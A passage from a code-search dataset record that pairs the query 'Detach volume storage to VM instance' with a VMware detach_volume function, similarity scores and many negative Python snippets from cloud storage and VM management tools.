processutils.ProcessExecutionError:\n # Check to see if mountpoint is mounted despite the error\n # eg it was already mounted\n if os.path.ismount(mountpoint):\n # We're not going to raise the exception because we're\n # in the desired state anyway. However, this is still\n # unusual so we'll log it.\n LOG.exception(\n 'Error mounting %(fstypes export %(export)s on '\n '%(mountpoint)s. Continuing because mountpount is '\n 'mounted despite this.',\n {'fstype': fstype, 'export': export,\n 'mountpoint': mountpoint}, instance=instance)\n else:\n # If the mount failed there's no reason for us to keep\n # a record of it. It will be created again if the\n # caller retries.\n\n # Delete while holding lock\n del self.mountpoints[mountpoint]\n\n raise\n\n mount.add_attachment(vol_name, instance.uuid)\n\n LOG.debug('_HostMountState.mount() for %(mountpoint)s '\n 'generation %(gen)s completed successfully',\n {'mountpoint': mountpoint, 'gen': self.generation},\n instance=instance)", "def _create_volume(display_name='test_volume',\n display_description='this is a test volume',\n status='available',\n size=1,\n project_id=fake.PROJECT_ID,\n attach_status=fields.VolumeAttachStatus.DETACHED):\n vol = {}\n vol['host'] = 'fake_host'\n vol['size'] = size\n vol['user_id'] = fake.USER_ID\n vol['project_id'] = project_id\n vol['status'] = status\n vol['display_name'] = display_name\n vol['display_description'] = display_description\n vol['attach_status'] = attach_status\n vol['availability_zone'] = 'fake_zone'\n vol['volume_type_id'] = fake.VOLUME_TYPE_ID\n return db.volume_create(context.get_admin_context(), vol)['id']", "def mount_volume(self, kwargs):\n\n exp_params = [('dev_name', is_string),\n ('vol_name', is_string)]\n try:\n dev_name, vol_name = check_arguments(exp_params, kwargs)\n dev_name = \"/dev/%s\" % dev_name\n self.check_volume_name(vol_name)\n except Exception as ex:\n return HttpErrorResponse(\"%s\" % ex)\n\n self.logger.info(\"Mount operation starting up for volume '%s' on '%s'\"\n % (vol_name, dev_name))\n\n try:\n mount_point = join(self.VOLUME_DIR, vol_name)\n self._mount(dev_name, mount_point, True)\n except Exception as e:\n self.logger.exception(\"Failed to mount volume '%s'\" % vol_name)\n return HttpErrorResponse('Failed to mount volume: ' + e.message)\n\n self.logger.info('Mount operation completed')\n return HttpJsonResponse()", "def create_volume(self, volume):\n vg_name = self.get_volume_group_name(volume.id)\n vol_name = self.get_volume_name(volume.id)\n prov_type = self._get_is_dedup(volume.get('volume_type'))\n try:\n LOG.debug(\"Creating volume group with name: %(name)s, \"\n \"quota: unlimited and dedup_support: %(dedup)s\",\n {'name': vg_name, 'dedup': prov_type})\n\n vg = self.client.new(\"volume_groups\", name=vg_name, quota=0,\n is_dedup=prov_type).save()\n LOG.debug(\"Creating volume with name: %(name)s, size: %(size)s \"\n \"GB, volume_group: %(vg)s\",\n {'name': vol_name, 'size': volume.size, 'vg': vg_name})\n vol = self.client.new(\"volumes\", name=vol_name,\n size=volume.size * units.Mi,\n volume_group=vg).save()\n except Exception as ex:\n vg_rs = self.client.search(\"volume_groups\", name=vg_name)\n if vg_rs.total != 0:\n LOG.debug(\"Deleting vg: %s for failed volume in K2.\", vg_name)\n vg_rs.hits[0].delete()\n LOG.exception(\"Creation of volume %s failed.\", vol_name)\n raise KaminarioCinderDriverException(reason=ex)\n\n if self._get_is_replica(volume.volume_type) and self.replica:\n self._create_volume_replica(volume, vg, vol, self.replica.rpo)", "def test_extend_volume(self):\n ctxt = context.get_admin_context()\n extra_specs = {}\n type_ref = volume_types.create(ctxt, 'hgst-1', extra_specs)\n volume = {'id': '1', 'name': 'volume1',\n 'display_name': '',\n 'volume_type_id': type_ref['id'],\n 'size': 10,\n 'provider_id': 'volume10'}\n self.extended = {'name': '', 'size': '0',\n 'storageserver': ''}\n self.driver.extend_volume(volume, 12)\n expected = {'name': 'volume10', 'size': '2',\n 'storageserver': 'stor1:gbd0,stor2:gbd0,'}\n self.assertDictMatch(expected, self.extended)", "def add_disk_for_rhv_platform():\n platform = config.ENV_DATA.get(\"platform\").lower()\n if platform == constants.RHV_PLATFORM:\n # Importing here to avoid circular dependency\n from ocs_ci.deployment.rhv import RHVBASE\n\n rhv_base = RHVBASE()\n rhv_base.attach_disks(\n config.ENV_DATA.get(\"device_size\", defaults.DEVICE_SIZE),\n config.ENV_DATA.get(\"disk_format\", constants.RHV_DISK_FORMAT_RAW),\n config.ENV_DATA.get(\n \"disk_interface\", constants.RHV_DISK_INTERFACE_VIRTIO_SCSI\n ),\n config.ENV_DATA.get(\"sparse\"),\n config.ENV_DATA.get(\"pass_discard\"),\n )", "def add_disk(self, vm, size, disk_type='thin'):\n logger.info(f\"Adding disk to {vm.config.name}\")\n spec = vim.vm.ConfigSpec()\n controller = self.get_controller_for_adding_disk(vm)\n unit_number = self.get_unit_number(vm)\n logger.info(f\"Unit number for new disk: {unit_number}\")\n\n device_changes = []\n new_disk_kb = int(size) * GB2KB\n disk_spec = vim.vm.device.VirtualDeviceSpec()\n disk_spec.fileOperation = \"create\"\n disk_spec.operation = vim.vm.device.VirtualDeviceSpec.Operation.add\n disk_spec.device = vim.vm.device.VirtualDisk()\n disk_spec.device.backing = vim.vm.device.VirtualDisk.FlatVer2BackingInfo()\n if disk_type == VM_DISK_TYPE:\n disk_spec.device.backing.thinProvisioned = True\n disk_spec.device.backing.diskMode = VM_DISK_MODE\n disk_spec.device.unitNumber = unit_number\n disk_spec.device.capacityInKB = new_disk_kb\n disk_spec.device.controllerKey = controller.key\n device_changes.append(disk_spec)\n spec.deviceChange = device_changes\n WaitForTask(vm.ReconfigVM_Task(spec=spec))\n logger.info(f\"{size}GB disk added successfully to {vm.config.name}\")", "def add_vdisk(client, resource_group_name, vm_name, controller=\"1000\",\n independence_mode=\"persistent\", size=16777216):\n from .vendored_sdks.models import VirtualDisk\n\n virtual_machine = client.get(resource_group_name, vm_name)\n disk = VirtualDisk(controller_id=controller,\n independence_mode=independence_mode,\n total_size=size)\n\n virtual_machine.disks.append(disk)\n return client.create_or_update(resource_group_name, vm_name, virtual_machine)", "def _attach_vifs(self, instance, network_info):\n if not network_info:\n return\n container_id = self._find_container_by_name(instance['name']).get('id')\n if not container_id:\n return\n netns_path = '/var/run/netns'\n if not os.path.exists(netns_path):\n utils.execute(\n 'mkdir', '-p', netns_path, run_as_root=True)\n nspid = self._find_container_pid(container_id)\n if not nspid:\n msg = _('Cannot find any PID under container \"{0}\"')\n raise RuntimeError(msg.format(container_id))\n netns_path = os.path.join(netns_path, container_id)\n utils.execute(\n 'ln', '-sf', '/proc/{0}/ns/net'.format(nspid),\n '/var/run/netns/{0}'.format(container_id),\n run_as_root=True)\n\n for vif in network_info:\n self.vif_driver.attach(instance, vif, container_id)", "def copy_volume_to_image(self, context, volume, image_service, image_meta):\n volume['provider_location'] = (\n self.create_export(context, volume, None)['provider_location'])\n connection_data = self.initialize_connection(volume, None)['data']\n target_connector = (\n connector.InitiatorConnector.factory(initiator.NVME,\n utils.get_root_helper()))\n\n try:\n device_info = target_connector.connect_volume(connection_data)\n except Exception:\n LOG.info('Could not connect SPDK target device')\n return\n\n connection_data['device_path'] = device_info['path']\n\n try:\n volume_utils.upload_volume(context,\n image_service,\n image_meta,\n device_info['path'],\n volume)\n finally:\n target_connector.disconnect_volume(connection_data, volume)", "def create_volume(c,i):\n return c.volumes.create(\n size = \"10\",\n display_name = \"instantserver-1\",\n display_description = \"Volume for instantserver-1\",\n imageRef = i\n )", "def detach_volume(self,\n connection_info,\n instance,\n mountpoint,\n encryption=None):\n volume_data = connection_info['data']\n azure_name = self._get_omni_name_from_instance(instance)\n azure_instance = utils.get_instance(\n self.compute_client, drv_conf.resource_group, azure_name)\n data_disks = azure_instance.storage_profile.data_disks\n name = volume_data['name']\n filtered_disks = [disk for disk in data_disks if disk.name != name]\n if len(filtered_disks) == len(data_disks):\n LOG.error(\"Volume %s was not attached to instance %s\" %\n (name, instance.uuid))\n return\n azure_instance.storage_profile.data_disks = filtered_disks\n utils.create_or_update_instance(self.compute_client,\n drv_conf.resource_group, azure_name,\n azure_instance)\n LOG.info(\"Detached volume %s from instance %s\" % (name, instance.uuid))", "def createVM(self ,disk ,name):\n return", "def test_11_migrate_vm_live_attach_disk_on_remote(self):\n \n global vm2\n global data_disk_2\n data_disk_2 = self.helper.create_custom_disk(\n self.apiclient,\n {\"diskname\":\"StorPoolDisk\" },\n zoneid=self.zone.id,\n size = 5,\n miniops = 2000,\n maxiops = 5000,\n account=self.account.name,\n domainid=self.account.domainid,\n diskofferingid=self.disk_offerings.id,\n )\n\n self.debug(\"Created volume with ID: %s\" % data_disk_2.id)\n\n self.virtual_machine_live_migration_2.attach_volume(\n self.apiclient,\n data_disk_2\n )\n\n destinationHost, vol_list = self.helper.get_destination_pools_hosts(self.apiclient, vm2, self.host_remote)\n for v in vol_list:\n self.helper.check_storpool_volume_iops(self.spapi, v)\n vm2 = self.helper.migrateVm(self.apiclient, self.virtual_machine_live_migration_2, destinationHost)\n\n\n self.virtual_machine_live_migration_2.attach_volume(\n self.apiclient,\n self.volume_2\n )\n\n destinationHost, vol_list = self.helper.get_destination_pools_hosts(self.apiclient, vm2, self.host_remote)\n for v in vol_list:\n self.helper.check_storpool_volume_iops(self.spapi, v)\n vm2 = self.helper.migrateVm(self.apiclient, self.virtual_machine_live_migration_2, destinationHost)", "def extend_volume(self, volume, new_size):\n if isinstance(new_size, dict):\n new_size = random.randint(new_size[\"min\"], new_size[\"max\"])\n\n aname = \"cinder_v%s.extend_volume\" % self.version\n with atomic.ActionTimer(self, aname):\n self._get_client().volumes.extend(volume, new_size)\n return self._wait_available_volume(volume)", "def add_file_or_directory_volume(self,\n runtime, # type: List[Text]\n volume, # type: MapperEnt\n host_outdir_tgt # type: Optional[Text]\n ):\n if not volume.resolved.startswith(\"_:\"):\n self._add_volume_binding(volume.resolved, volume.target) # this one defaults to read_only", "def attach_disk(self, instance, disk, zone):\n return self.call_api(\n '/zones/%s/instances/%s/attachDisk' % (zone, instance),\n method='POST',\n payload={\n 'autoDelete': True,\n 'deviceName': disk,\n 'source': 'projects/%s/zones/%s/disks/%s' % (\n self.project_id, zone, disk),\n },\n )", "def migrate_volume(self, ctxt, volume_id, host, force_host_copy=False):\n return", "def on_volume(self, _instance, volume):\n self._set_volume(volume)", "def _volume(self, volume):\n self._append_or_create_property(SparkProperties.SPARK_MESOS_EXECUTOR_DOCKER_VOLUMES, volume)\n return self", "def map_volume(self, initiator, volume_name):\n hostID = self.get_host_id(initiator)\n uid = self.get_uid(volume_name)\n volInfo = self.get_volume_info(uid)\n volID = volInfo.get(SVC_KEY_VDISK_ID)\n\n cmd = \"svctask mkvdiskhostmap -host %s -force %s\" % (hostID, volID)\n self._svc_command(cmd)", "def create_volume(\n self, size, volume_type, name=None, description=None,\n availability_zone=None, metadata=None, bootable=None,\n image_ref=None, snapshot_id=None, source_volid=None):\n\n resp = self.client.create_volume(\n size, volume_type, name=name, description=description,\n availability_zone=availability_zone, metadata=metadata,\n bootable=bootable, image_ref=image_ref, snapshot_id=snapshot_id,\n source_volid=source_volid)\n\n return resp", "def _create_external_volume():\n\n if not utils.use_external_resource(ctx.node.properties):\n return False\n\n volume_id = ctx.node.properties['resource_id']\n\n volume = _get_volumes_from_id(volume_id)\n if not volume:\n raise NonRecoverableError(\n 'External EBS volume was indicated, but the '\n 'volume id does not exist.')\n utils.set_external_resource_id(volume.id, ctx.instance)\n return True", "def do_create_volume(self, arg):\n args = self.parse_arguments(arg)\n if len(args) == 0:\n self.perror(\"No name given.\")\n return\n if len(args) == 1:\n self.perror(\"No path given.\")\n return\n if not os.path.isabs(args[1]):\n print(\"Path must be absolute: \" + args[1])\n return\n self.do_coroutine(self._localStorageRoutines.create_volume_routine(args[0], args[1]))", "def volume(self, volume):\n\n self._volume = volume", "def volume(self, volume):\n\n self._volume = volume", "def volume(self, volume):\n\n self._volume = volume", "def test_aws_service_api_volume_attachment_put(self):\n pass", "def fusion_api_add_existing_storage_volume(self, body, api=None, headers=None):\n return self.volume.add_existing(body=body, api=api, headers=headers)", "def swap_volume(self, old_connection_info, new_connection_info,\n instance, mountpoint, resize_to):", "def mount(self, mount_point):\n log.debug(\"Mounting {0} for {1}\".format(mount_point, self.fs.get_full_name()))\n for counter in range(30):\n if self.status == volume_status.ATTACHED:\n if os.path.exists(mount_point):\n # Check if the mount location is empty\n if len(os.listdir(mount_point)) != 0:\n log.warning(\"Mount point {0} already exists and is not \"\n \"empty!? ({2}) Will attempt to mount volume {1}\"\n .format(mount_point, self.volume_id,\n os.listdir(mount_point)))\n # return False\n else:\n log.debug(\"Creating mount point directory {0} for {1}\"\n .format(mount_point, self.fs.get_full_name()))\n try:\n os.mkdir(mount_point)\n except Exception, e:\n log.warning(\"Could not create {0} mount point {1}: {2}\"\n .format(self.fs.get_full_name(), mount_point, e))\n # Potentially wait for the device to actually become available in the system\n # TODO: Do something if the device is not available in the\n # given time period\n for i in range(10):\n if os.path.exists(self.device):\n log.debug(\"Device path {0} checked and it exists.\".format(\n self.device))\n break\n else:\n log.debug(\"Device path {0} does not yet exist; waiting...\".format(\n self.device))\n time.sleep(4)\n # Until the underlying issue is fixed (see FIXME below), mask this\n # even more by custom-handling the run command and thus not\n # printing the err\n cmd = '/bin/mount %s %s' % (self.device, mount_point)\n try:\n process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n _, _ = process.communicate()\n if process.returncode != 0:\n # FIXME: Assume if a file system cannot be mounted that it's because\n # there is not a file system on the device so try creating\n # one\n if run('/sbin/mkfs.xfs %s' % self.device,\n \"Failed to create a file system on device %s\" % self.device,\n \"Created a file system on device %s\" % self.device):\n if not run(\n '/bin/mount %s %s' % (self.device, mount_point),\n \"Error mounting file system %s from %s\" % (\n mount_point, self.device),\n \"Successfully mounted file system %s from %s\" %\n (mount_point, self.device)):\n log.error(\"Failed to mount device '%s' to mount point '%s'\"\n % (self.device, mount_point))\n return False\n # Resize the volume if it was created from a snapshot\n else:\n if self.snapshot and self.volume.size > self.snapshot.volume_size:\n run('/usr/sbin/xfs_growfs %s' % mount_point)\n log.info(\n \"Successfully grew file system {0}\".format(self.fs.get_full_name()))\n except Exception, e:\n log.error(\"Exception mounting {0} at {1}\".format(\n self.fs.get_full_name(), mount_point))\n return False\n try:\n # Default owner of all mounted file systems to `galaxy`\n # user\n os.chown(mount_point, pwd.getpwnam(\n \"galaxy\")[2], grp.getgrnam(\"galaxy\")[2])\n # Add Galaxy- and CloudBioLinux-required files under the\n # 'data' dir\n if ServiceRole.GALAXY_DATA in self.fs.svc_roles:\n for sd in ['files', 'tmp', 'upload_store', 'export']:\n path = os.path.join(\n self.app.path_resolver.galaxy_data, sd)\n if not os.path.exists(path):\n os.mkdir(path)\n # Make 'export' dir that's shared over NFS be\n # owned by `ubuntu` user so it's accesible\n # for use to the rest of the cluster\n if sd == 'export':\n os.chown(path, pwd.getpwnam(\n \"ubuntu\")[2], grp.getgrnam(\"ubuntu\")[2])\n else:\n os.chown(path, pwd.getpwnam(\n \"galaxy\")[2], grp.getgrnam(\"galaxy\")[2])\n except OSError, e:\n log.debug(\n \"Tried making 'galaxyData' sub-dirs but failed: %s\" % e)\n # If based on an archive, extract archive contents to the mount point\n if self.from_archive:\n # Do not overwrite an existing dir structure w/ the archive\n # content. This happens when a cluster is rebooted.\n if self.fs.name == 'galaxy' and \\\n os.path.exists(self.app.path_resolver.galaxy_home):\n log.debug(\"Galaxy home dir ({0}) already exists; not \"\n \"extracting the archive ({1}) so not to \"\n \"overwrite it.\".format(self.app.path_resolver.galaxy_home,\n self.from_archive['url']))\n self.fs.nfs_share_and_set_state()\n else:\n self.fs.state = service_states.CONFIGURING\n # Extract the FS archive in a separate thread\n ExtractArchive(self.from_archive['url'], mount_point,\n self.from_archive['md5_sum'],\n callback=self.fs.nfs_share_and_set_state).run()\n else:\n self.fs.nfs_share_and_set_state()\n return True\n else:\n log.warning(\"Cannot mount volume '%s' in state '%s'. Waiting \"\n \"(%s/30).\" % (self.volume_id, self.status, counter))\n time.sleep(2)", "def detach_volume(self, connection_info, instance, mountpoint,\n encryption=None):", "def __init__(__self__, *,\n mount_path: pulumi.Input[str],\n type: pulumi.Input[str],\n enable_sub_path: Optional[pulumi.Input[bool]] = None,\n mount_options: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n read_only: Optional[pulumi.Input[bool]] = None,\n share_name: Optional[pulumi.Input[str]] = None):\n pulumi.set(__self__, \"mount_path\", mount_path)\n pulumi.set(__self__, \"type\", 'AzureFileVolume')\n if enable_sub_path is None:\n enable_sub_path = False\n if enable_sub_path is not None:\n pulumi.set(__self__, \"enable_sub_path\", enable_sub_path)\n if mount_options is not None:\n pulumi.set(__self__, \"mount_options\", mount_options)\n if read_only is not None:\n pulumi.set(__self__, \"read_only\", read_only)\n if share_name is not None:\n pulumi.set(__self__, \"share_name\", share_name)", "def add_writable_file_volume(self,\n runtime, # type: List[Text]\n volume, # type: MapperEnt\n host_outdir_tgt, # type: Optional[Text]\n tmpdir_prefix # type: Text\n ):\n if self.inplace_update:\n self._add_volume_binding(volume.resolved, volume.target, writable=True)\n else:\n if host_outdir_tgt:\n # shortcut, just copy to the output directory\n # which is already going to be mounted\n log.debug('shutil.copy({}, {})'.format(volume.resolved, host_outdir_tgt))\n shutil.copy(volume.resolved, host_outdir_tgt)\n else:\n log.debug('tempfile.mkdtemp(dir={})'.format(self.tmpdir))\n tmpdir = tempfile.mkdtemp(dir=self.tmpdir)\n file_copy = os.path.join(\n tmpdir, os.path.basename(volume.resolved))\n log.debug('shutil.copy({}, {})'.format(volume.resolved, file_copy))\n shutil.copy(volume.resolved, file_copy)\n self._add_volume_binding(file_copy, volume.target, writable=True)\n ensure_writable(host_outdir_tgt or file_copy)", "def _get_system_volume(vm_):\n\n # Override system volume size if 'disk_size' is defined in cloud profile\n disk_size = get_size(vm_)[\"disk\"]\n if \"disk_size\" in vm_:\n disk_size = vm_[\"disk_size\"]\n\n # Construct the system volume\n volume = Volume(\n name=\"{} Storage\".format(vm_[\"name\"]),\n size=disk_size,\n disk_type=get_disk_type(vm_),\n )\n\n if \"image_password\" in vm_:\n image_password = vm_[\"image_password\"]\n volume.image_password = image_password\n\n # Retrieve list of SSH public keys\n ssh_keys = get_public_keys(vm_)\n volume.ssh_keys = ssh_keys\n\n if \"image_alias\" in vm_.keys():\n volume.image_alias = vm_[\"image_alias\"]\n else:\n volume.image = get_image(vm_)[\"id\"]\n # Set volume availability zone if defined in the cloud profile\n if \"disk_availability_zone\" in vm_:\n volume.availability_zone = vm_[\"disk_availability_zone\"]\n\n return volume", "def extend_volume(self, volume, new_size):\n spdk_name = self._get_spdk_volume_name(volume.name)\n params = {'name': spdk_name, 'size': new_size * units.Gi}\n self._rpc_call('bdev_lvol_resize', params)", "def add_volume(self, volume_block, apfs_tree):\n\n # get volume superblock\n block = self.read_block(volume_block)\n block_map = block.body.block_map_block # mapping btree\n root_dir_id = block.body.root_dir_id # root dir id\n if self.verbose:\n vol_desc = \"%s (volume, Mapping-Btree: %d, Rootdir-ID: %d\" % (\n block.body.name, block_map, root_dir_id)\n else:\n vol_desc = block.body.name\n\n # get volume btree\n block = self.read_block(block_map)\n\n # get root btree node and parse it with all its children, collecting dir entries\n block = self.read_block(block.body.root)\n entries = self.get_entries(block)\n\n # create a tree from the found dir entries\n vol_node = Node(vol_desc, apfs_tree)\n self.list_children(1, entries, vol_node)", "def mount(self, dev, path, mount_options):\n # if directory is not a mount point, mount it\n if not os.path.ismount(path):\n # check to see if dev is LVM. If so, activate it's associated volume group\n vg = self.get_vg(dev)\n if len(vg) > 0:\n Helper._runOsCommand(\"sudo /sbin/pvscan && sudo /sbin/vgscan && sudo /sbin/lvscan && sudo /sbin/vgchange -ay %s\" % vg, self.tracer)\n # check / create mount point and mount device\n self._checkAndCreatePath(path)\n self._mount(dev, path, mount_options)\n else:\n self.tracer.info(\"device %s is already mounted to %s\" % (dev, path))", "def createLogicalVolume(self, vg, filesystem, name, mountpoint, size):\n lv = {}\n lv['command'] = 'create:logvol'\n lv['vg'] = vg\n lv['fs'] = filesystem\n lv['size'] = size - EXTENT_SIZE + 1\n lv['name'] = name\n lv['mountPoint'] = mountpoint\n lv['format'] = 'yes'\n\n return lv", "def create_volume(self, name: str, size: int) -> dto.Volume:\n raise errors.UnsupportedOperationError(\n \"Operation not supported for provider '{}'\".format(self.provider_name)\n )", "def register_volume(Ec2VolumeId=None, StackId=None):\n pass" ]
[ "0.81846446", "0.7974021", "0.79596764", "0.7858076", "0.7515268", "0.74380124", "0.74260545", "0.7417238", "0.72209245", "0.71213835", "0.7119569", "0.7005731", "0.6974186", "0.6920998", "0.68285924", "0.68272907", "0.6788624", "0.67863244", "0.67736286", "0.6771072", "0.6723547", "0.67089164", "0.6560618", "0.65304494", "0.64819926", "0.64619076", "0.6425282", "0.6422804", "0.6414482", "0.6393748", "0.6392118", "0.6359186", "0.6301514", "0.62971157", "0.6288974", "0.62723774", "0.62687874", "0.6155545", "0.6143512", "0.61316574", "0.61313564", "0.609626", "0.6018387", "0.60137737", "0.60119", "0.59982073", "0.5924947", "0.5902315", "0.5886486", "0.5865461", "0.58586514", "0.5829731", "0.5823636", "0.58228105", "0.5819494", "0.58126", "0.5786875", "0.57865745", "0.5785748", "0.57817554", "0.577726", "0.5758262", "0.57564944", "0.57425386", "0.5739587", "0.57308507", "0.57241136", "0.57098854", "0.57045305", "0.56968254", "0.5696411", "0.5693049", "0.5686495", "0.5681572", "0.56782305", "0.5675447", "0.563833", "0.5632644", "0.5619126", "0.5610453", "0.56104374", "0.5608469", "0.5584758", "0.55806124", "0.55806124", "0.55806124", "0.55786407", "0.55580807", "0.5552819", "0.5550245", "0.5544884", "0.5544874", "0.5541121", "0.5539458", "0.55343246", "0.5515345", "0.5495205", "0.5490238", "0.5487129", "0.54865295" ]
0.7598646
4
Detach volume storage to VM instance.
def detach_volume(self, connection_info, instance, mountpoint): instance_name = instance['name'] vm_ref = vm_util.get_vm_ref_from_name(self._session, instance_name) if vm_ref is None: raise exception.InstanceNotFound(instance_id=instance_name) # Detach Volume from VM LOG.debug(_("Detach_volume: %(instance_name)s, %(mountpoint)s") % locals()) driver_type = connection_info['driver_volume_type'] if driver_type not in ['iscsi']: raise exception.VolumeDriverNotFound(driver_type=driver_type) data = connection_info['data'] # Discover iSCSI Target device_name, uuid = volume_util.find_st(self._session, data, self._cluster) if device_name is None: raise volume_util.StorageError(_("Unable to find iSCSI Target")) # Get the vmdk file name that the VM is pointing to hardware_devices = self._session._call_method(vim_util, "get_dynamic_property", vm_ref, "VirtualMachine", "config.hardware.device") device = vm_util.get_rdm_disk(hardware_devices, uuid) if device is None: raise volume_util.StorageError(_("Unable to find volume")) self.detach_disk_from_vm(vm_ref, instance_name, device) LOG.info(_("Mountpoint %(mountpoint)s detached from " "instance %(instance_name)s") % locals())
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def detach_volume(self, connection_info, instance, mountpoint,\n encryption=None):", "def detach_volume(self):\n\n # Choose the volume\n volume_id = self._choose_among_used_volumes()\n\n # Cancel\n if not volume_id:\n print 'Operation cancelled'\n return\n\n # Detach the volume\n print '# Detaching volume \"%s\"!' % volume_id\n if self.compute.detach_volume(volume_id):\n print 'The volume has been detached!'\n else:\n print 'The volume could not been detached'", "def detach_volume(self, connection_info, instance, mountpoint,\n encryption=None):\n vhd_name = connection_info['data']['disk_name']\n vm = self._get_instance(instance.uuid)\n data_disks = vm.storage_profile.data_disks\n not_found = True\n for i in range(len(data_disks)):\n if vhd_name == data_disks[i].name:\n del data_disks[i]\n not_found = False\n break\n if not_found:\n LOG.info(_LI('Volume: %s was not attached to Instance!'),\n vhd_name, instance=instance)\n return\n self._create_update_instance(instance, vm)\n LOG.info(_LI(\"Detach Volume to Instance in Azure finish\"),\n instance=instance)", "def detach(self):\r\n\r\n return self.driver.detach_volume(volume=self)", "def detach_volume(self, host_path: str):\n del self.volumes[host_path]", "def detach_volume(self, instance_name, mountpoint):\n return True", "def detach_volume(self, context, volume_id):\n # TODO(vish): refactor this into a more general \"unreserve\"\n # TODO(sleepsonthefloor): Is this 'elevated' appropriate?\n # self.db.volume_detached(context.elevated(), volume_id)\n self.db.volume_admin_metadata_delete(context.elevated(), volume_id,\n 'attached_mode')", "def detach_volume(self,\n connection_info,\n instance,\n mountpoint,\n encryption=None):\n volume_data = connection_info['data']\n azure_name = self._get_omni_name_from_instance(instance)\n azure_instance = utils.get_instance(\n self.compute_client, drv_conf.resource_group, azure_name)\n data_disks = azure_instance.storage_profile.data_disks\n name = volume_data['name']\n filtered_disks = [disk for disk in data_disks if disk.name != name]\n if len(filtered_disks) == len(data_disks):\n LOG.error(\"Volume %s was not attached to instance %s\" %\n (name, instance.uuid))\n return\n azure_instance.storage_profile.data_disks = filtered_disks\n utils.create_or_update_instance(self.compute_client,\n drv_conf.resource_group, azure_name,\n azure_instance)\n LOG.info(\"Detached volume %s from instance %s\" % (name, instance.uuid))", "def detach(args, **_):\n\n volume_id = \\\n utils.get_external_resource_id_or_raise(\n 'detach volume', ctx.source.instance)\n instance_id = \\\n utils.get_external_resource_id_or_raise(\n 'detach volume', ctx.target.instance)\n\n if _detach_external_volume_or_instance():\n return\n\n ctx.logger.debug('Detaching EBS volume {0}'.format(volume_id))\n\n volume_object = _get_volumes_from_id(volume_id)\n\n if not volume_object:\n raise NonRecoverableError(\n 'EBS volume {0} not found in account.'.format(volume_id))\n\n try:\n detached = volume_object.detach(**args)\n except (boto.exception.EC2ResponseError,\n boto.exception.BotoServerError) as e:\n raise NonRecoverableError('{0}'.format(str(e)))\n\n if not detached:\n raise NonRecoverableError(\n 'Failed to detach volume {0} from instance {1}'\n .format(volume_id, instance_id))\n\n utils.unassign_runtime_property_from_resource(\n 'instance_id', ctx.source.instance)\n ctx.logger.info(\n 'Detached volume {0} from instance {1}.'\n .format(volume_id, instance_id))", "def detach(self, name):\n volume_info = self.cm.find_name(name)\n if volume_info and volume_info[0]['State'] != \"deleted\":\n vms = volume_info[0]['AttachedToVm']\n path = volume_info[0]['path']\n if len(vms) == 0:\n Console.error(f\"{name} is not attached to any vm\")\n else:\n removed = []\n for vm in vms:\n result = self.unmount(path=f\"{path}/{name}\", vm=vm)\n mounts = result['mounts']\n if f\"{path}/{name}\" not in mounts.keys():\n removed.append(vm)\n for vm in removed:\n vms.remove(vm)\n result = self.update_volume_after_detach(volume_info, vms)\n return result[0]\n else:\n Console.error(\"volume does not exist or volume had been deleted\")", "def _detach_volume(self, server, volume):\n try:\n volume = self.volumes_client.show_volume(volume['id'])['volume']\n # Check the status. You can only detach an in-use volume, otherwise\n # the compute API will return a 400 response.\n if volume['status'] == 'in-use':\n self.servers_client.detach_volume(server['id'], volume['id'])\n except lib_exc.NotFound:\n # Ignore 404s on detach in case the server is deleted or the volume\n # is already detached.\n pass", "def _detach_volume(self, server, volume):\n try:\n volume = self.volumes_client.show_volume(volume['id'])['volume']\n # Check the status. You can only detach an in-use volume, otherwise\n # the compute API will return a 400 response.\n if volume['status'] == 'in-use':\n self.servers_client.detach_volume(server['id'], volume['id'])\n except lib_exc.NotFound:\n # Ignore 404s on detach in case the server is deleted or the volume\n # is already detached.\n pass", "def detach_volume(self, volume: Union[dto.Volume, str]) -> dto.Volume:\n raise errors.UnsupportedOperationError(\n \"Operation not supported for provider '{}'\".format(self.provider_name)\n )", "def detach_volume(self, volume):\r\n if hasattr(volume, \"id\"):\r\n volume_id = volume.id\r\n else:\r\n volume_id = volume\r\n return self.ec2.detach_volume(volume_id=volume_id, instance_id=self.instance_id)", "def detach_volume(self, volume_id, instance_id = \"\"):\n response = volume.detach_volume(self.url, self.verb, self.headers,\n self.version, volume_id, instance_id)\n if response is not None :\n res = DetachVolumeResponse.DetachVolumeResponse()\n parseString(str(response.text), res)\n return res\n else :\n return None", "def detach(self, force=False):\r\n instance_id = None\r\n if self.attach_data:\r\n instance_id = self.attach_data.instance_id\r\n device = None\r\n if self.attach_data:\r\n device = self.attach_data.device\r\n return self.connection.detach_volume(self.id, instance_id, device, force)", "def detach_volume(self, volume_id, instance_id=None,\r\n device=None, force=False):\r\n params = {'VolumeId' : volume_id}\r\n if instance_id:\r\n params['InstanceId'] = instance_id\r\n if device:\r\n params['Device'] = device\r\n if force:\r\n params['Force'] = 'true'\r\n return self.get_status('DetachVolume', params, verb='POST')", "def DetachVolume(self, request, global_params=None):\n config = self.GetMethodConfig('DetachVolume')\n return self._RunMethod(\n config, request, global_params=global_params)", "def detachDisk(positive, alias, vmName):\n logger.info(\"Detaching disk %s from vm %s\", alias, vmName)\n disk_attachment = get_disk_attachment(vmName, alias, attr='name')\n return DISK_ATTACHMENTS_API.delete(disk_attachment, positive)", "def detach(self):\n if (self.status == volume_status.ATTACHED or self.status == volume_status.IN_USE) \\\n and self.volume:\n try:\n self.volume.detach()\n except EC2ResponseError, e:\n log.error(\"Detaching volume '%s' from instance '%s' failed. Exception: %s\"\n % (self.volume_id, self.app.cloud_interface.get_instance_id(), e))\n return False\n self.wait_for_status(volume_status.AVAILABLE, 240)\n if self.volume and self.status != volume_status.AVAILABLE:\n log.debug('Attempting to detach again.')\n try:\n self.volume.detach()\n except EC2ResponseError, e:\n log.error(\"Detaching volume '%s' from instance '%s' failed. Exception: %s\" % (\n self.volume_id, self.app.cloud_interface.get_instance_id(), e))\n return False\n if not self.wait_for_status(volume_status.AVAILABLE, 60):\n log.warning('Volume {0} did not detach properly. Left in state {1}'\n .format(self.volume_id, self.status))\n return False\n else:\n log.debug(\"Volume '%s' already not attached ('%s')\"\n % (self.volume_id, self.status))\n return False\n return True", "def remove(self, mount_point, delete_vols=False, detach=True):\n log.debug(\"Removing volume-based FS @ mount point {0} (delete_vols: \"\n \"{1}; detach: {2})\".format(mount_point, delete_vols, detach))\n 